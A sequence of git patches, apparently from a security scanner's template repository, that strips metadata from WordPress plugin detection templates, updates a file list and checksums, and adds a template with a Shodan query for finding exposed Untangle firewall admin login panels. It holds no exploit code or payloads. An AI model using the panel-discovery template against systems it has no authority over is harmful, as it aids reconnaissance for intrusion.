a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 434530cf03bd2b81500c0611e5f824e500a5a2e1 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 3 Jul 2023 10:56:41 +0530 Subject: [PATCH 287/609] Create untangle-admin-login.yaml --- http/exposed-panels/untangle-admin-login.yaml | 38 +++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 http/exposed-panels/untangle-admin-login.yaml diff --git a/http/exposed-panels/untangle-admin-login.yaml b/http/exposed-panels/untangle-admin-login.yaml new file mode 100644 index 0000000000..cc0fc96e0b --- /dev/null +++ b/http/exposed-panels/untangle-admin-login.yaml @@ -0,0 +1,38 @@ +id: untangle-admin-login + +info: + name: Untangle Administrator Login Panel - Detect + author: irshad ahamed + severity: info + description: | + Untangle Administrator is a centralized web-based management console that allows administrators to efficiently configure, monitor, and control various network security and filtering features provided by the Untangle NG Firewall, ensuring robust network protection and policy enforcement. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + reference: + - https://edge.arista.com/ng-firewall/ + metadata: + verified: true + shodan-query: title:"Untangle Administrator Login" + tags: panel,untangle,admin,login + +http: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/auth/login' + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Untangle Administrator Login" + + - type: status + status: + - 200 From 17c00747d4cbfe52a4cc25e3b38a1aaf39a5691a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 3 Jul 2023 05:27:32 +0000 Subject: [PATCH 288/609] Auto Generated New Template Addition List [Mon Jul 3 05:27:32 UTC 2023] :robot: --- .new-additions | 52 +------------------------------------------------- 1 file changed, 1 insertion(+), 51 deletions(-) diff --git a/.new-additions b/.new-additions index ea1a3f63af..1e110ddd06 100644 --- a/.new-additions +++ b/.new-additions @@ -1,51 +1 @@ -file/nodejs/admzip-path-overwrite.yaml -file/nodejs/express-lfr.yaml -file/nodejs/generic-path-traversal.yaml -file/nodejs/tar-path-overwrite.yaml -file/nodejs/xss-serialize-javascript.yaml -file/nodejs/zip-path-overwrite.yaml -http/cnvd/2020/CNVD-2020-63964.yaml -http/cves/2012/CVE-2012-6499.yaml -http/cves/2021/CVE-2021-46704.yaml -http/cves/2022/CVE-2022-40022.yaml -http/cves/2023/CVE-2023-0126.yaml -http/cves/2023/CVE-2023-0527.yaml -http/cves/2023/CVE-2023-0562.yaml -http/cves/2023/CVE-2023-0563.yaml -http/cves/2023/CVE-2023-1454.yaml -http/cves/2023/CVE-2023-1496.yaml -http/cves/2023/CVE-2023-20888.yaml -http/cves/2023/CVE-2023-20889.yaml -http/cves/2023/CVE-2023-24488.yaml -http/cves/2023/CVE-2023-25346.yaml -http/cves/2023/CVE-2023-26842.yaml -http/cves/2023/CVE-2023-26843.yaml -http/cves/2023/CVE-2023-27372.yaml -http/cves/2023/CVE-2023-30019.yaml -http/cves/2023/CVE-2023-31548.yaml -http/cves/2023/CVE-2023-33510.yaml -http/cves/2023/CVE-2023-34537.yaml -http/cves/2023/CVE-2023-34598.yaml -http/cves/2023/CVE-2023-34599.yaml -http/cves/2023/CVE-2023-34659.yaml -http/cves/2023/CVE-2023-34843.yaml -http/cves/2023/CVE-2023-35843.yaml -http/cves/2023/CVE-2023-35844.yaml -http/exposed-panels/axxon-client-panel.yaml -http/exposed-panels/jsherp-boot-panel.yaml -http/exposed-panels/openbullet2-panel.yaml -http/exposed-panels/syncserver-panel.yaml -http/exposed-panels/wd-mycloud-panel.yaml -http/exposures/configs/aws-config.yaml -http/exposures/configs/aws-credentials.yaml -http/misconfiguration/codeigniter-errorpage.yaml -http/misconfiguration/genieacs-default-jwt.yaml -http/misconfiguration/grav-register-admin.yaml -http/misconfiguration/installer/spip-install.yaml -http/misconfiguration/odoo-unprotected-database.yaml -http/technologies/wordpress/plugins/wp-rollback.yaml -http/vulnerabilities/hikvision-ivms-file-upload-rce.yaml -http/vulnerabilities/kkfileview-ssrf.yaml -http/vulnerabilities/vbulletin/arcade-php-sqli.yaml -network/enumeration/psql-user-enum.yaml -network/misconfig/unauth-psql.yaml +http/exposed-panels/pritunl-panel.yaml From 9fa72b24b09e0db9808b0b482ab847bf152a7149 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 3 Jul 2023 05:27:46 +0000 Subject: [PATCH 289/609] Auto Generated Templates Checksum [Mon Jul 3 05:27:46 UTC 2023] :robot: --- templates-checksum.txt | 415 +++++++++++++++++++++-------------------- 1 file changed, 208 insertions(+), 207 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 505b988851..56cfa1e964 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2,11 +2,11 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593 CONTRIBUTING.md:a280fa8badd8622a481e1bb7f492dd82ac05ea71 LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7 -README.md:5d758a72e5dfca78e2b8bca52a2857dd08de1fbf +README.md:e4fd537abe53ce59a671693fa6edba3543a7cdbd README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26 -TEMPLATES-STATS.json:76d960cb9efb4a76eb9a7319a18434de2b9224f9 -TEMPLATES-STATS.md:ff843bb4bf7feb5abe452334bc7fa76d66da0ed5 -TOP-10.md:98a95dca7b8b2a1992b076ae8cd121513e09e330 +TEMPLATES-STATS.json:b322c9ba292e0298b561b25a8950e989c4b50787 +TEMPLATES-STATS.md:a53dea26d4e3da65292a159ecd28b58abe0f6f3a +TOP-10.md:f96c096252794274c196f158e78053e036412447 contributors.json:db5c97304376896f78f0752cca0e621d7c97b235 cves.json:6f6522c4f81a83ea6d81232a8f0431ae89debd56 cves.json-checksum.txt:de8647fd559b188eefb327d735e6248559639a97 @@ -315,13 +315,13 @@ helpers/wordpress/plugins/pretty-link.txt:fbc954f986ea78ee55f14e1ee288f60983e46f helpers/wordpress/plugins/really-simple-captcha.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/really-simple-ssl.txt:cfb1a020caaeba8b61a9e907652aed3d696c8ce9 helpers/wordpress/plugins/redirection.txt:392ee3765c26f4ca0b6935f9bb0f006c2354af12 -helpers/wordpress/plugins/redux-framework.txt:68a50e98458a9c28886ed15ffb2cc666b2d3d49b +helpers/wordpress/plugins/redux-framework.txt:5e3c54ec1686b257c15fe3bd98af9e08d983b8ab helpers/wordpress/plugins/regenerate-thumbnails.txt:d1fd48333115227b181b4b132e5511e91d95bea5 helpers/wordpress/plugins/safe-svg.txt:d24fa45ca77f079cc359c97272276969e6aead2c helpers/wordpress/plugins/seo-by-rank-math.txt:aa66ca91043cb47f7b1ca18775c6c15b64833ecf helpers/wordpress/plugins/sg-cachepress.txt:0ead27062f705c3ed0f2b1ac2ad2a7f47418176c helpers/wordpress/plugins/sg-security.txt:6546e0bd1a292663f6166d3d6d903530b6db35c4 -helpers/wordpress/plugins/shortcodes-ultimate.txt:404069cef132c1712e21fc32e891e96cf01bca92 +helpers/wordpress/plugins/shortcodes-ultimate.txt:1df8c069e6146a62340d8cec28e0b6f641693bd0 helpers/wordpress/plugins/shortpixel-image-optimiser.txt:713afc477e35aa343e8d0dd831aa85fab6ba2e0f helpers/wordpress/plugins/simple-custom-post-order.txt:c696496c332f4053d974090a9c80d9d35ebc2ca6 helpers/wordpress/plugins/simple-page-ordering.txt:8f52888ff7e35fd5ca310231fa076be1206b49bd @@ -3041,6 +3041,7 @@ http/exposed-panels/posthog-admin-panel.yaml:f94d12f6819d43739b7056ffa870702e4ed http/exposed-panels/powercom-network-manager.yaml:5b6a963d4908bc0053a3dbf8177ebae3c239354d http/exposed-panels/powerjob-panel.yaml:c6d0408b7a0a03610cc8a336bf95cc9264dab9dd http/exposed-panels/powerlogic-ion.yaml:43e4ca94ca8a74176ab30961694495fc1ac563b8 +http/exposed-panels/pritunl-panel.yaml:12f029b8fab0b7d80fea216e3eb818f5679ed271 http/exposed-panels/privx-panel.yaml:9c60ef49e3ea10f8dd177ceaaf6e155892e14185 http/exposed-panels/processwire-login.yaml:3696ddbd3cf6b2a92793d51ccf5f397bbcbb9526 http/exposed-panels/project-insight-login.yaml:31b350d211dcd1ba5b9efa7690984fea2d8f765f @@ -5328,214 +5329,214 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd -http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 -http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e -http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 -http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f -http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 -http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 -http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c -http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff -http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a -http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c -http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d -http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae -http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 -http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 -http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 -http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c -http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 -http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e -http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a -http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f -http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 -http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 -http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad -http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f -http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 -http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af -http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a -http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 +http/technologies/wordpress/plugins/cloudflare.yaml:431bca4737941e71c01f7ab9ce8f7fc45c7670a2 +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 +http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 +http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 +http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 +http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a +http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 +http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab -http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 -http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 -http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e -http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba -http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d -http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 -http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 -http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca -http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:8f722e7fd4d82c5a072583269575be55ab6d3124 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f -http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 -http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc -http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 -http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 -http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 -http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 -http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 -http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 -http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b -http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f -http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde -http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a -http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac -http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 -http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 